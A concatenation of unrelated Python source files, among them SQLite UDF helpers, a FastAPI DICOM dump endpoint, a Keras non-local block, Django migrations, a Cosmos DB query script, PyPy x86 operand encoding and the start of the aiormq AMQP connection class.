def _register_function(func, con):
"""Register a Python callable with a SQLite connection `con`.
Parameters
----------
func : callable
con : sqlalchemy.Connection
"""
nargs = _number_of_arguments(func)
con.connection.connection.create_function(func.__name__, nargs, func)
def _register_aggregate(agg, con):
"""Register a Python class that performs aggregation in SQLite.
Parameters
----------
agg : type
con : sqlalchemy.Connection
"""
nargs = _number_of_arguments(agg.step) - 1 # because self
con.connection.connection.create_aggregate(agg.__name__, nargs, agg)
def register_all(con):
"""Register all udf and udaf with the connection.
All udf and udaf are defined in this file with the `udf` and `udaf`
decorators.
Parameters
----------
con : sqlalchemy.Connection
"""
for func in _SQLITE_UDF_REGISTRY:
con.run_callable(functools.partial(_register_function, func))
for agg in _SQLITE_UDAF_REGISTRY:
con.run_callable(functools.partial(_register_aggregate, agg))
|
#!/usr/bin/env python3
from meerkat_api import app
app.run(debug=app.config['DEBUG'], host="0.0.0.0")
# Replace above with following line for production
# app.run(host='0.0.0.0')
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
Topic: 字符串搜索和替换
Desc :
"""
import re
from calendar import month_abbr
def change_date(m):
mon_name = month_abbr[int(m.group(1))]
return '{} {} {}'.format(m.group(2), mon_name, m.group(3))
def search_replace():
text = 'yeah, but no, but yeah, but no, but yeah'
print(text.replace('yeah', 'yep'))
# 复杂的模式,使用sub()
text = 'Today is 11/27/2012. PyCon starts 3/13/2013.'
print(re.sub(r'(\d+)/(\d+)/(\d+)', r'\3-\1-\2', text))
print(re.sub(r'(?P<month>\d+)/(?P<day>\d+)/(?P<year>\d+)', r'\g<year>-\g<month>-\g<day>', text))
# 先编译
datepat = re.compile(r'(\d+)/(\d+)/(\d+)')
print(datepat.sub(r'\3-\1-\2', text))
# 更复杂的替换,使用回调函数
print(datepat.sub(change_date, text))
# 同时返回替换次数
newtext, n = datepat.subn(r'\3-\1-\2', text)
print(newtext, n)
if __name__ == '__main__':
search_replace()
|
import os
import yaml
CONFKEY_STORAGE_FILE = "storage_file"
CONFKEY_STORAGE_MAX_AGE_SECS = "storage_max_age_secs" # former: "restore_last_max_diff"
class StorageException(Exception):
pass
class Storage:
def __init__(self):
self._file = None
self._data = None
def set_file(self, file):
self._file = file
def empty(self):
self._data = {}
@property
def initilized(self):
return self._data is not None
def load(self):
try:
if self._file is not None and os.path.isfile(self._file):
with open(self._file, 'r') as stream:
self._data = yaml.unsafe_load(stream)
else:
self.empty()
except (PermissionError, ValueError) as ex:
raise StorageException(ex)
def save(self):
if self._file is not None:
try:
# backup and write to a new file to avoid flashing the same sdcards bits again and again?
with open(self._file, 'w') as stream:
yaml.dump(self._data, stream, default_flow_style=False)
except PermissionError as ex:
raise StorageException(ex)
def get(self, key, default=None):
return self._data.get(key, default)
def set(self, key, value):
self._data[key] = value
def delete(self, key):
self._data.pop(key, None)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# this is a virtual module that is entirely implemented server side
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: win_template
version_added: "1.9.2"
short_description: Template a file out to a remote server
options:
backup:
description:
- Determine whether a backup should be created.
- When set to C(yes), create a backup file including the timestamp information
so you can get the original file back if you somehow clobbered it incorrectly.
type: bool
default: no
version_added: '2.8'
newline_sequence:
default: '\r\n'
force:
version_added: '2.4'
notes:
- Beware fetching files from windows machines when creating templates because certain tools, such as Powershell ISE,
and regedit's export facility add a Byte Order Mark as the first character of the file, which can cause tracebacks.
- You can use the M(win_copy) module with the C(content:) option if you prefer the template inline, as part of the
playbook.
- For Linux you can use M(template) which uses '\\n' as C(newline_sequence) by default.
seealso:
- module: win_copy
- module: copy
- module: template
author:
- Jon Hawkesworth (@jhawkesworth)
extends_documentation_fragment:
- template_common
'''
EXAMPLES = r'''
- name: Create a file from a Jinja2 template
win_template:
src: /mytemplates/file.conf.j2
dest: C:\Temp\file.conf
- name: Create a Unix-style file from a Jinja2 template
win_template:
src: unix/config.conf.j2
dest: C:\share\unix\config.conf
newline_sequence: '\n'
backup: yes
'''
RETURN = r'''
backup_file:
description: Name of the backup file that was created.
returned: if backup=yes
type: str
sample: C:\Path\To\File.txt.11540.20150212-220915.bak
'''
|
script_location = '/fastapi/dump_dicom.sh'
from fastapi import Depends, APIRouter, HTTPException
from pydantic import BaseModel
from typing import List
import datetime
from starlette.responses import Response, FileResponse, PlainTextResponse
router = APIRouter()
from .auth import logged_in_user, User
from ..util import Database
import asyncio
import logging
@router.get("/{file_id}")
async def dump_dicom(file_id: int, db: Database = Depends()):
# get the filename from the database
logging.debug(f"Generating dump for {file_id}")
query = """
select root_path || '/' || rel_path as file
from
file_location
natural join file_storage_root
where file_id = $1
"""
records = await db.fetch(query, [file_id])
try:
file = records[0]['file']
logging.debug(file)
except IndexError:
raise HTTPException(detail=f"file_id {file_id} does not exist", status_code=404)
try:
proc = await asyncio.create_subprocess_exec(
script_location, file, stdout=asyncio.subprocess.PIPE)
except Exception as e:
logging.error("Failed to create subprocess")
logging.error(e)
raise e
logging.debug("process created, about to wait on it")
# await proc.wait() # wait for it to end
# logging.debug("process ended, getting data")
data = await proc.stdout.read() # read entire output
logging.debug("data got, returning it")
try:
new_data = data.decode()
except UnicodeDecodeError:
# Guess at the encoding
import chardet
encoding = chardet.detect(data)['encoding']
new_data = data.decode(encoding)
return PlainTextResponse(new_data)
|
from tensorflow.keras.layers import Activation, Reshape, Lambda, Multiply, dot, add
from tensorflow.keras.layers import Conv1D, Conv2D, Conv3D
from tensorflow.keras.layers import MaxPool1D
from tensorflow.keras import backend as K
def non_local_block(ip, out_channels, height, width, name, intermediate_dim=None, compression=2,
mode='embedded', add_residual=True):
"""
Adds a Non-Local block for self attention to the input tensor.
Input tensor can be or rank 3 (temporal), 4 (spatial) or 5 (spatio-temporal).
Arguments:
ip: input tensor
intermediate_dim: The dimension of the intermediate representation. Can be
`None` or a positive integer greater than 0. If `None`, computes the
intermediate dimension as half of the input channel dimension.
compression: None or positive integer. Compresses the intermediate
representation during the dot products to reduce memory consumption.
Default is set to 2, which states halve the time/space/spatio-time
dimension for the intermediate step. Set to 1 to prevent computation
compression. None or 1 causes no reduction.
mode: Mode of operation. Can be one of `embedded`, `gaussian`, `dot` or
`concatenate`.
add_residual: Boolean value to decide if the residual connection should be
added or not. Default is True for ResNets, and False for Self Attention.
Returns:
a tensor of same shape as input
"""
channel_dim = 1 if K.image_data_format() == 'channels_first' else -1
ip_shape = K.shape(ip)
if mode not in ['gaussian', 'embedded', 'dot', 'concatenate']:
raise ValueError('`mode` must be one of `gaussian`, `embedded`, `dot` or `concatenate`')
if compression is None:
compression = 1
dim1, dim2, dim3 = None, None, None
# check rank and calculate the input shape
if ip_shape.shape[0] == 3: # temporal / time series data
rank = 3
batchsize, dim1, channels = ip.get_shape().as_list()
elif ip_shape.shape[0] == 4: # spatial / image data
rank = 4
if channel_dim == 1:
batchsize, channels, dim1, dim2 = ip.get_shape().as_list()
else:
batchsize, dim1, dim2, channels = ip.get_shape().as_list()
dim1 = height
dim2 = width
channels = out_channels
elif ip_shape.shape[0] == 5: # spatio-temporal / Video or Voxel data
rank = 5
if channel_dim == 1:
batchsize, channels, dim1, dim2, dim3 = ip.get_shape().as_list()
else:
batchsize, dim1, dim2, dim3, channels = ip.get_shape().as_list()
else:
raise ValueError('Input dimension has to be either 3 (temporal), 4 (spatial) or 5 (spatio-temporal)')
# verify correct intermediate dimension specified
if intermediate_dim is None:
intermediate_dim = out_channels // 2
if intermediate_dim < 1:
intermediate_dim = 1
else:
intermediate_dim = int(intermediate_dim)
if intermediate_dim < 1:
raise ValueError('`intermediate_dim` must be either `None` or positive integer greater than 1.')
if mode == 'gaussian': # Gaussian instantiation
x1 = Reshape((-1, channels))(ip) # xi
x2 = Reshape((-1, channels))(ip) # xj
f = dot([x1, x2], axes=2)
f = Activation('softmax')(f)
elif mode == 'dot': # Dot instantiation
# theta path
theta = _convND(ip, rank, intermediate_dim, name=name+'_dot1')
theta = Reshape((-1, intermediate_dim))(theta)
# theta = tf.transpose(theta, [0, 2, 1])
# phi path
phi = _convND(ip, rank, intermediate_dim, name=name+'_dot2')
phi = Reshape((-1, intermediate_dim))(phi)
f = dot([theta, phi], axes=[2,2])
f = Lambda(lambda z: (1. / K.cast(height*width, 'float32')) * z)(f)
elif mode == 'concatenate': # Concatenation instantiation
raise NotImplementedError('Concatenate model has not been implemented yet')
else: # Embedded Gaussian instantiation
# theta path
theta = _convND(ip, rank, intermediate_dim)
theta = Reshape((-1, intermediate_dim))(theta)
# phi path
phi = _convND(ip, rank, intermediate_dim)
phi = Reshape((-1, intermediate_dim))(phi)
if compression > 1:
# shielded computation
phi = MaxPool1D(compression)(phi)
f = dot([theta, phi], axes=2)
f = Activation('softmax')(f)
# g path
g = _convND(ip, rank, intermediate_dim, name=name+'_g')
g = Reshape((-1, intermediate_dim))(g)
if compression > 1 and mode == 'embedded':
# shielded computation
g = MaxPool1D(compression)(g)
# compute output path
y = dot([f, g], axes=[2, 1])
# reshape to input tensor format
if rank == 3:
y = Reshape((dim1, intermediate_dim))(y)
elif rank == 4:
if channel_dim == -1:
y = Reshape((dim1, dim2, intermediate_dim))(y)
else:
y = Reshape((intermediate_dim, dim1, dim2))(y)
else:
if channel_dim == -1:
y = Reshape((dim1, dim2, dim3, intermediate_dim))(y)
else:
y = Reshape((intermediate_dim, dim1, dim2, dim3))(y)
# project filters
y = _convND(y, rank, channels, name=name+'_y')
# residual connection
if add_residual:
y = add([ip, y])
return y
def _convND(ip, rank, channels, name):
assert rank in [3, 4, 5], "Rank of input must be 3, 4 or 5"
if rank == 3:
x = Conv1D(channels, 1, padding='same', use_bias=False, kernel_initializer='he_normal')(ip)
elif rank == 4:
x = Conv2D(channels, (1, 1), padding='same', use_bias=False, kernel_initializer='he_normal', name=name)(ip)
else:
x = Conv3D(channels, (1, 1, 1), padding='same', use_bias=False, kernel_initializer='he_normal')(ip)
return x
|
import requests
import json
from seoulai_gym.envs.market.config import BASE_URL
class BaseAPI():
def __init__(
self,
) -> None:
"""Initialize BaseAPI
Args:
None
Returns:
None
"""
def api_post(
self,
cmd,
data,
):
url = BASE_URL + cmd
headers = {"content-type": "application/json"}
r = requests.post(url,
headers=headers,
data=json.dumps(data))
if r.status_code == 200:
return r.json()
return None
def api_get(
self,
cmd,
data,
):
url = BASE_URL + cmd
conditions = [key+"="+value for key, value in data.items()]
query = "?" + "&".join(conditions)
url += query
r = requests.get(url)
if r.status_code == 200:
return r.json()
return None
|
# Generated by Django 3.1.13 on 2021-10-28 21:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("interactive", "0018_auto_20210909_2046"),
]
operations = [
migrations.CreateModel(
name="Game",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("index", models.IntegerField(help_text="Bruk helst 10, 20, 30 osv.")),
("title", models.TextField()),
("url", models.TextField()),
(
"picture",
models.ImageField(
blank=True,
help_text="Bruk samme størrelse på alle bilder, helst 770x300 px",
null=True,
upload_to="uploads/game_pictures",
verbose_name="Bilde",
),
),
],
options={
"ordering": ["index"],
},
),
]
|
"""
A script for executing a query and store the results.
The environment variables COSMOS_ENDPOINT and COSMOS_KEY need to be set.
"""
import json
import os
import time
from datetime import datetime
import humanfriendly
from azure.cosmos.cosmos_client import CosmosClient
#%% Common queries
# This query is used when preparing tfrecords for object detector training
# We do not want to get the whole seq obj where at least one image has bbox because some images in that sequence
# will not be bbox labeled so will be confusing
query_bbox = '''
SELECT im.bbox, im.file, seq.dataset, seq.location
FROM sequences seq JOIN im IN seq.images
WHERE ARRAY_LENGTH(im.bbox) >= 0
'''
# For public datasets to be converted to the CCT format, we get the whole seq object because
# sequence level attributes need to be included too. megadb/converters/megadb_to_cct.py handles
# the case of bbox-only JSONs with the flag exclude_species_class
query_lila = '''
SELECT seq
FROM sequences seq
WHERE (SELECT VALUE COUNT(im) FROM im IN seq.images WHERE ARRAY_LENGTH(im.bbox) >= 0) > 0
'''
query_empty = '''
SELECT im.file, seq.dataset, seq.location
FROM sequences seq JOIN im IN seq.images
WHERE ARRAY_LENGTH(im.class) = 1 AND ARRAY_CONTAINS(im.class, "empty")
OR ARRAY_LENGTH(seq.class) = 1 AND ARRAY_CONTAINS(seq.class, "empty")
'''
#%% Parameters
query = query_lila
output_dir = '/home/marmot/camtrap/data/wcs_boxes'
assert os.path.isdir(output_dir), 'Please create the output directory first'
output_indent = None # None if no indentation needed in the output, or int
partition_key='wcs' # use None if querying across all partitions
save_every = 20000
assert save_every > 0
# use False for when the results file will be too big to store in memory or in a single JSON.
consolidate_results = True
#%% Script
time_stamp = datetime.utcnow().strftime('%Y%m%d%H%M%S')
# initialize Cosmos DB client
url = os.environ['COSMOS_ENDPOINT']
key = os.environ['COSMOS_KEY']
client = CosmosClient(url, credential=key)
database = client.get_database_client('camera-trap')
container_sequences = database.get_container_client('sequences')
# execute the query
start_time = time.time()
if partition_key:
result_iterable = container_sequences.query_items(query=query,
partition_key=partition_key)
else:
result_iterable = container_sequences.query_items(query=query,
enable_cross_partition_query=True)
# loop through and save the results
results = []
item_count = 0
part_count = 0
part_paths = []
for item in result_iterable:
results.append(item['seq']) # MODIFY HERE depending on the query
item_count += 1
if item_count % save_every == 0:
part_count += 1
print('Saving results part {}. Example item:'.format(part_count))
print(results[-1])
part_path = os.path.join(output_dir, '{}_{}.json'.format(time_stamp, item_count))
with open(part_path, 'w') as f:
json.dump(results, f)
results = [] # clear the results list
part_paths.append(part_path)
elapsed = time.time() - start_time
print('Getting all the results used {}'.format(humanfriendly.format_timespan(elapsed)))
if consolidate_results:
print('Consolidating the parts...')
all_results = results # the unsaved entries
for part_path in part_paths:
with open(part_path) as f:
part_items = json.load(f)
all_results.extend(part_items)
print('Number of items from iterable is {}; number of items in consolidated results is {}'.format(item_count,
len(all_results)))
out_path = os.path.join(output_dir, '{}_all.json'.format(time_stamp))
with open(out_path, 'w') as f:
json.dump(all_results, f, indent=output_indent)
print('Consolidated results saved to {}'.format(out_path))
print('Removing partitions...')
for part_path in part_paths:
os.remove(part_path)
print('Done!')
|
# Generated by Django 3.0.4 on 2020-03-10 11:06
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("bokstaever", "0032_pagemodel_show_menu"),
]
operations = [
migrations.DeleteModel(name="Settings",),
]
|
import glob
import numpy as np
import math
from process import *
files = sorted(glob.glob("../../data/raw/trunk/60gs/3rd_eval/*.txt"))
path = files[3]
data = np.loadtxt(path, skiprows=6)
time = data[:, 0]
torque = data[:, 1]
velocity = data[:, 4]
angle = abs(data[:, 3])
angle = abs(angle - 60)
# Gravity torque vars
mass = 48.90154
g = 9.81
upper_body_length = 0.73
percent = 0.5
distance = upper_body_length * percent
angle_c = angle + 10
angle_c = 90 + angle_c
angle_c = angle_c * (math.pi / 180)
a = np.zeros(torque.shape)
Tg = mass * g * distance * np.sin(angle_c)
Tc = np.empty(shape=torque.shape, dtype='object')
# for i in range(0, len(torque)):
# if velocity[i] > 0:
# Tc[i] = torque[i] Tg[i]
# elif velocity[i] < 0:
# Tc[i] = torque[i] - Tg[i]
# elif velocity[i] == 0:
# Tc[i] = torque[i]
Tc = torque - Tg
# Plot
fig1 = plt.figure(figsize=(18, 9))
ax1 = fig1.add_subplot(2, 1, 1)
ax2 = fig1.add_subplot(2, 1, 2)
# Add a multicursor to all subplotsg
multi = MultiCursor(fig1.canvas, (ax1, ax2), color="k", linewidth=1)
multi
ax1.plot(time, torque, color="tab:blue", label="Torque (Nm)")
ax1.plot(time, velocity, color="tab:orange", label="Velocity (°/s)")
ax1.plot(time, Tg, color="tab:red", label="Torque corrected")
ax2.plot(time, angle, color="tab:green", label="Anatomical position (°)")
ax1.legend(loc="upper right")
ax2.legend(loc="upper right")
# Add a horizontal line at torque and velocity = 0
ax1.axhline(y=0, color="tab:blue", linestyle="dotted")
# Add horizontal lines at the selected isokinetic velocity
ax1.axhline(y=60, color="tab:orange", linestyle="dotted")
ax1.axhline(y=-60, color="tab:orange", linestyle="dotted")
title = set_plot_title(path)
ax1.set_title(title)
plt.tight_layout()
plt.show()
|
from pypy.rlib.rarithmetic import intmask
class OPERAND(object):
_attrs_ = []
def __repr__(self):
return '<%s %s>' % (self.__class__.__name__, self.assembler())
class REG(OPERAND):
width = 4
def __repr__(self):
return '<%s>' % self.__class__.__name__.lower()
def assembler(self):
return '%' + self.__class__.__name__.lower()
def lowest8bits(self):
if self.op < 4:
return registers8[self.op]
else:
raise ValueError
class FLOATREG(OPERAND):
width = 4
def __repr__(self):
return '<ST(%d)>' % self.num
def assembler(self):
raise TypeError("Float registers should not appear in assembler")
class ST0(FLOATREG): num=0
class ST1(FLOATREG): num=1
class ST2(FLOATREG): num=2
class ST3(FLOATREG): num=3
class ST4(FLOATREG): num=4
class ST5(FLOATREG): num=5
class ST6(FLOATREG): num=6
class ST7(FLOATREG): num=7
class REG8(OPERAND):
width = 1
def __repr__(self):
return '<%s>' % self.__class__.__name__.lower()
def assembler(self):
return '%' + self.__class__.__name__.lower()
class EAX(REG): op=0
class ECX(REG): op=1
class EDX(REG): op=2
class EBX(REG): op=3
class ESP(REG): op=4
class EBP(REG): op=5
class ESI(REG): op=6
class EDI(REG): op=7
class AL(REG8): op=0
class CL(REG8): op=1
class DL(REG8): op=2
class BL(REG8): op=3
class AH(REG8): op=4
class CH(REG8): op=5
class DH(REG8): op=6
class BH(REG8): op=7
class IMM32(OPERAND):
width = 4
value = 0 # annotator hack
def __init__(self, value):
self.value = value
def assembler(self):
return '$%d' % (self.value,)
def lowest8bits(self):
val = self.value & 0xFF
if val > 0x7F:
val -= 0x100
return IMM8(val)
class IMM8(IMM32):
width = 1
class IMM16(OPERAND): # only for RET
width = 2
value = 0 # annotator hack
def __init__(self, value):
self.value = value
def assembler(self):
return '$%d' % (self.value,)
class MODRM(OPERAND):
width = 4
def __init__(self, byte, extradata):
self.byte = byte
self.extradata = extradata
def lowest8bits(self):
return MODRM8(self.byte, self.extradata)
def assembler(self):
mod = self.byte & 0xC0
rm = self.byte & 0x07
if mod == 0xC0:
return registers[rm].assembler()
if self.byte == 0x05:
return '%d' % (unpack(self.extradata),)
if mod == 0x00:
offset_bytes = 0
elif mod == 0x40:
offset_bytes = 1
else:
offset_bytes = 4
if rm == 4:
SIB = ord(self.extradata[0])
scale = (SIB & 0xC0) >> 6
index = (SIB & 0x38) >> 3
base = (SIB & 0x07)
if base == 5 and mod == 0x00:
offset_bytes = 4
basename = ''
else:
basename = registers[base].assembler()
if index == 4:
# no index
s = '(%s)' % (basename,)
else:
indexname = registers[index].assembler()
s = '(%s,%s,%d)' % (basename, indexname, 1 << scale)
offset = self.extradata[1:]
else:
s = '(%s)' % (registers[rm].assembler(),)
offset = self.extradata
assert len(offset) == offset_bytes
if offset_bytes > 0:
s = '%d%s' % (unpack(offset), s)
return s
def is_register(self):
mod = self.byte & 0xC0
return mod == 0xC0
def ofs_relative_to_ebp(self):
# very custom: if self is a mem(ebp, ofs) then return ofs
# otherwise raise ValueError
mod = self.byte & 0xC0
rm = self.byte & 0x07
if mod == 0xC0:
raise ValueError # self is just a register
if self.byte == 0x05:
raise ValueError # self is just an [immediate]
if rm != 5:
raise ValueError # not a simple [ebp+ofs]
offset = self.extradata
if not offset:
return 0
else:
return unpack(offset)
def is_relative_to_ebp(self):
try:
self.ofs_relative_to_ebp()
except ValueError:
return False
else:
return True
def involves_ecx(self):
# very custom: is ecx present in this mod/rm?
mod = self.byte & 0xC0
rm = self.byte & 0x07
if mod != 0xC0 and rm == 4:
SIB = ord(self.extradata[0])
index = (SIB & 0x38) >> 3
base = (SIB & 0x07)
return base == ECX.op or index == ECX.op
else:
return rm == ECX.op
class MODRM64(MODRM):
width = 8
# XXX some logic that it cannot be register
class MODRM8(MODRM):
width = 1
class REL32(OPERAND):
width = 4
def __init__(self, absolute_target):
self.absolute_target = absolute_target
def assembler(self):
return '%d' % (self.absolute_target,)
class MISSING(OPERAND):
def __repr__(self):
return '<MISSING>'
# ____________________________________________________________
# Public interface: the concrete operands to instructions
#
# NB.: UPPERCASE names represent classes of operands (the same
# instruction can have multiple modes, depending on these
# classes), while lowercase names are concrete operands.
eax = EAX()
ecx = ECX()
edx = EDX()
ebx = EBX()
esp = ESP()
ebp = EBP()
esi = ESI()
edi = EDI()
al = AL()
cl = CL()
dl = DL()
bl = BL()
ah = AH()
ch = CH()
dh = DH()
bh = BH()
registers = [eax, ecx, edx, ebx, esp, ebp, esi, edi]
registers8 = [al, cl, dl, bl, ah, ch, dh, bh]
for r in registers + registers8:
r.bitmask = 1 << r.op
del r
imm32 = IMM32
imm8 = IMM8
imm16 = IMM16
rel32 = REL32
def imm(value):
if single_byte(value):
return imm8(value)
else:
return imm32(value)
def memregister(register):
assert register.width == 4
return MODRM(0xC0 | register.op, '')
def mem(basereg, offset=0):
return memSIB(basereg, None, 0, offset)
def memSIB(base, index, scaleshift, offset):
return _SIBencode(MODRM, base, index, scaleshift, offset)
def memSIB64(base, index, scaleshift, offset):
return _SIBencode(MODRM64, base, index, scaleshift, offset)
def memregister8(register):
assert register.width == 1
return MODRM8(0xC0 | register.op, '')
def mem8(basereg, offset=0):
return memSIB8(basereg, None, 0, offset)
def memSIB8(base, index, scaleshift, offset):
return _SIBencode(MODRM8, base, index, scaleshift, offset)
def _SIBencode(cls, base, index, scaleshift, offset):
assert base is None or isinstance(base, REG)
assert index is None or (isinstance(index, REG) and index is not esp)
assert 0<=scaleshift<4
if base is None:
if index is None:
return cls(0x05, packimm32(offset))
if scaleshift > 0:
return cls(0x04, chr((scaleshift<<6) | (index.op<<3) | 0x05) +
packimm32(offset))
base = index
index = None
if index is not None:
SIB = chr((scaleshift<<6) | (index.op<<3) | base.op)
elif base is esp:
SIB = '\x24'
elif offset == 0 and base is not ebp:
return cls(base.op, '')
elif single_byte(offset):
return cls(0x40 | base.op, packimm8(offset))
else:
return cls(0x80 | base.op, packimm32(offset))
if offset == 0 and base is not ebp:
return cls(0x04, SIB)
elif single_byte(offset):
return cls(0x44, SIB + packimm8(offset))
else:
return cls(0x84, SIB + packimm32(offset))
def fixedsize_ebp_ofs(offset):
return MODRM(0x80 | EBP.op, packimm32(offset))
def single_byte(value):
return -128 <= value < 128
def packimm32(i):
return (chr(i & 0xFF) +
chr((i >> 8) & 0xFF) +
chr((i >> 16) & 0xFF) +
chr((i >> 24) & 0xFF))
def packimm8(i):
if i < 0:
i += 256
return chr(i)
def packimm16(i):
return (chr(i & 0xFF) +
chr((i >> 8) & 0xFF))
def unpack(s):
assert len(s) in (1, 2, 4)
if len(s) == 1:
a = ord(s[0])
if a > 0x7f:
a -= 0x100
else:
a = ord(s[0]) | (ord(s[1]) << 8)
if len(s) == 2:
if a > 0x7fff:
a -= 0x10000
else:
a |= (ord(s[2]) << 16) | (ord(s[3]) << 24)
a = intmask(a)
return a
missing = MISSING()
# __________________________________________________________
# Abstract base class, with methods like NOP(), ADD(x, y), etc.
class I386CodeBuilder(object):
def write(self, data):
raise NotImplementedError
def tell(self):
raise NotImplementedError
import ri386setup # side-effect: add methods to I386CodeBuilder
|
#Arife Oran - 160401071
import socket
import time
import datetime
IP = '192.168.1.106'
Port = 142
try:
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serverSocket.bind((IP, Port))
print("IP: ", IP, " ", Port, ".port dinleniyor")
serverSocket.listen(5)
except socket.error as message:
print("Hata!", message)
conn,adrr = serverSocket.accept()
startTime = time.time()
print("Bağlantı kabul edildi")
msg = "Bağlantı Kuruldu"
conn.sendto(msg.encode(), (IP, Port))
def timeStamp():
return int((datetime.datetime.utcnow() - datetime.datetime(1970, 1, 1)).total_seconds() * 1000)
temp= 1
while (temp):
data = input("Zaman Dilimini Giriniz : UTC ")
if (data.startswith("+") or data.startswith("-") ):
utc = int(data) -3
timeStamp = timeStamp() + int(utc) * 3600000
sendTimeStamp = str(timeStamp) + '-UTC' + str(data)
print(sendTimeStamp)
conn.sendall(str(sendTimeStamp).encode('utf-8'))
sTime = float(timeStamp) / 1000.0
timeInfo = datetime.datetime.fromtimestamp(sTime).strftime('%m/%d/%Y %H:%M:%S.%f')
print(timeInfo)
temp=0
else:
print("Girdiğiniz zaman dilimi hatalıdır!")
serverSocket.close() |
import asyncio
import logging
import platform
import ssl
import typing
from base64 import b64decode
from contextlib import suppress
import pamqp.frame
from pamqp import ProtocolHeader
from pamqp import specification as spec
from pamqp.heartbeat import Heartbeat
from yarl import URL
from . import exceptions as exc
from .auth import AuthMechanism
from .base import Base, task
from .channel import Channel
from .tools import censor_url
from .types import (
ArgumentsType, SSLCerts,
URLorStr
)
from .version import __version__
log = logging.getLogger(__name__)
try:
from yarl import DEFAULT_PORTS
DEFAULT_PORTS['amqp'] = 5672
DEFAULT_PORTS['amqps'] = 5671
except ImportError:
pass
PRODUCT = 'aiormq'
PLATFORM = '{} {} ({} build {})'.format(
platform.python_implementation(),
platform.python_version(),
*platform.python_build()
)
def parse_bool(v: str):
return v == '1' or v.lower() in ('true', 'yes', 'y', 'enable', 'on')
def parse_int(v: str):
try:
return int(v)
except ValueError:
return 0
class Connection(Base):
FRAME_BUFFER = 10
# Interval between sending heartbeats based on the heartbeat(timeout)
HEARTBEAT_INTERVAL_MULTIPLIER = 0.5
# Allow two missed heartbeats (based on heartbeat(timeout)
HEARTBEAT_GRACE_MULTIPLIER = 3
_HEARTBEAT = pamqp.frame.marshal(Heartbeat(), 0)
@staticmethod
def _parse_ca_data(data) -> typing.Optional[bytes]:
return b64decode(data) if data else data
def __init__(self, url: URLorStr, *, parent=None,
loop: asyncio.AbstractEventLoop = None):
super().__init__(
loop=loop or asyncio.get_event_loop(),
parent=parent
)
self.url = URL(url)
if self.url.path == '/' or not self.url.path:
self.vhost = '/'
else:
self.vhost = self.url.path[1:]
self.reader = None # type: asyncio.StreamReader
self.writer = None # type: asyncio.StreamWriter
self.ssl_certs = SSLCerts(
cafile=self.url.query.get('cafile'),
capath=self.url.query.get('capath'),
cadata=self._parse_ca_data(self.url.query.get('cadata')),
key=self.url.query.get('keyfile'),
cert=self.url.query.get('certfile'),
verify=self.url.query.get('no_verify_ssl', '0') == '0'
)
self.started = False
self.__lock = asyncio.Lock(loop=self.loop)
self.__drain_lock = asyncio.Lock(loop=self.loop)
self.channels = {} # type: typing.Dict[int, typing.Optional[Channel]]
self.server_properties = None # type: spec.Connection.OpenOk
self.connection_tune = None # type: spec.Connection.TuneOk
self.last_channel = 1
self.heartbeat_monitoring = parse_bool(self.url.query.get(
'heartbeat_monitoring', '1'
))
self.heartbeat_timeout = parse_int(self.url.query.get(
'heartbeat', '0'
))
self.heartbeat_last_received = 0
self.last_channel_lock = asyncio.Lock(loop=self.loop)
self.connected = asyncio.Event(loop=self.loop)
@property
def lock(self):
if self.is_closed:
raise RuntimeError('%r closed' % self)
return self.__lock
async def drain(self):
if not self.writer:
raise RuntimeError("Writer is %r" % self.writer)
async with self.__drain_lock:
return await self.writer.drain()
@property
def is_opened(self):
return self.writer is not None and not self.is_closed
def __str__(self):
return str(censor_url(self.url))
def _get_ssl_context(self):
context = ssl.create_default_context(
(
ssl.Purpose.SERVER_AUTH
if self.ssl_certs.key
else ssl.Purpose.CLIENT_AUTH
),
capath=self.ssl_certs.capath,
cafile=self.ssl_certs.cafile,
cadata=self.ssl_certs.cadata,
)
if self.ssl_certs.key:
context.load_cert_chain(
self.ssl_certs.cert,
self.ssl_certs.key,
)
if not self.ssl_certs.verify:
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
return context
@staticmethod
def _client_capabilities():
return {
'platform': PLATFORM,
'version': __version__,
'product': PRODUCT,
'capabilities': {
'authentication_failure_close': True,
'basic.nack': True,
'connection.blocked': False,
'consumer_cancel_notify': True,
'publisher_confirms': True
},
'information': 'See https://github.com/mosquito/aiormq/',
}
@staticmethod
def _credentials_class(start_frame: spec.Connection.Start):
for mechanism in start_frame.mechanisms.decode().split():
with suppress(KeyError):
return AuthMechanism[mechanism]
raise exc.AuthenticationError(
start_frame.mechanisms,
[m.name for m in AuthMechanism]
)
async def __rpc(self, request: spec.Frame, wait_response=True):
self.writer.write(pamqp.frame.marshal(request, 0))
if not wait_response:
return
_, _, frame = await self.__receive_frame()
if request.synchronous and frame.name not in request.valid_responses:
raise spec.AMQPInternalError(frame, frame)
elif isinstance(frame, spec.Connection.Close):
if frame.reply_code == 403:
raise exc.ProbableAuthenticationError(frame.reply_text)
raise exc.ConnectionClosed(frame.reply_code, frame.reply_text)
return frame
@task
async def connect(self):
if self.writer is not None:
raise RuntimeError("Already connected")
ssl_context = None
if self.url.scheme == 'amqps':
ssl_context = await self.loop.run_in_executor(
None, self._get_ssl_context
)
try:
self.reader, self.writer = await asyncio.open_connection(
self.url.host, self.url.port, ssl=ssl_context,
loop=self.loop
)
except OSError as e:
raise ConnectionError(*e.args) from e
try:
protocol_header = ProtocolHeader()
self.writer.write(protocol_header.marshal())
res = await self.__receive_frame()
_, _, frame = res # type: spec.Connection.Start
self.heartbeat_last_received = self.loop.time()
except EOFError as e:
raise exc.IncompatibleProtocolError(*e.args) from e
credentials = self._credentials_class(frame)
self.server_properties = frame.server_properties
# noinspection PyTypeChecker
self.connection_tune = await self.__rpc(spec.Connection.StartOk(
client_properties=self._client_capabilities(),
mechanism=credentials.name,
response=credentials.value(self).marshal()
)) # type: spec.Connection.Tune
if self.heartbeat_timeout > 0:
self.connection_tune.heartbeat = self.heartbeat_timeout
await self.__rpc(spec.Connection.TuneOk(
channel_max=self.connection_tune.channel_max,
